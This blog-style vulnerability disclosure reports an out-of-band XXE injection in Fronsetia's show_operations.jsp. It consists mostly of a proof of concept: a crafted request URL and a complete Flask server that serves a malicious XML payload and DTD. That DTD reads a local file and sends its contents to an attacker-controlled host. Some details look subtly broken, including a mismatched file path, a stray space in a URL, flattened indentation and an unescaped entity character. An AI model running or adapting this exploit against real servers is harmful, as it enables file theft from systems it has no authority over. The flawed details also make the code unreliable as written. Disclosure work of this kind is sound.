Description
- The application is vulnerable to OOB XXE injection
XXE #1 - "show_operations.jsp"
Steps to Reproduce:
- Add Python3 server to serve malicious XXE payload
- Add a file on the file system to be read via the application XXE payload echo 123123 > /tmp
- Enter the following URL as input
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl
 |
// Python Server Code
from flask import Flask, Response, request
import logging
app = Flask(__name__)
# Set up logging
logging.basicConfig(level=logging.DEBUG)
@app.route('/testxxeService', defaults={'path': ''})
def catch_all(path):
app.logger.debug("Serving XXE payload")
xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
return Response(xml, mimetype='text/xml', status=200)
@app.route('/data.dtd', defaults={'path': ''})
def hello(path):
app.logger.debug("DTD requested")
xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">
%eval;
%exfil;"""
return Response(xml, mimetype='text/xml', status=200)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=10000)
No comments:
Post a Comment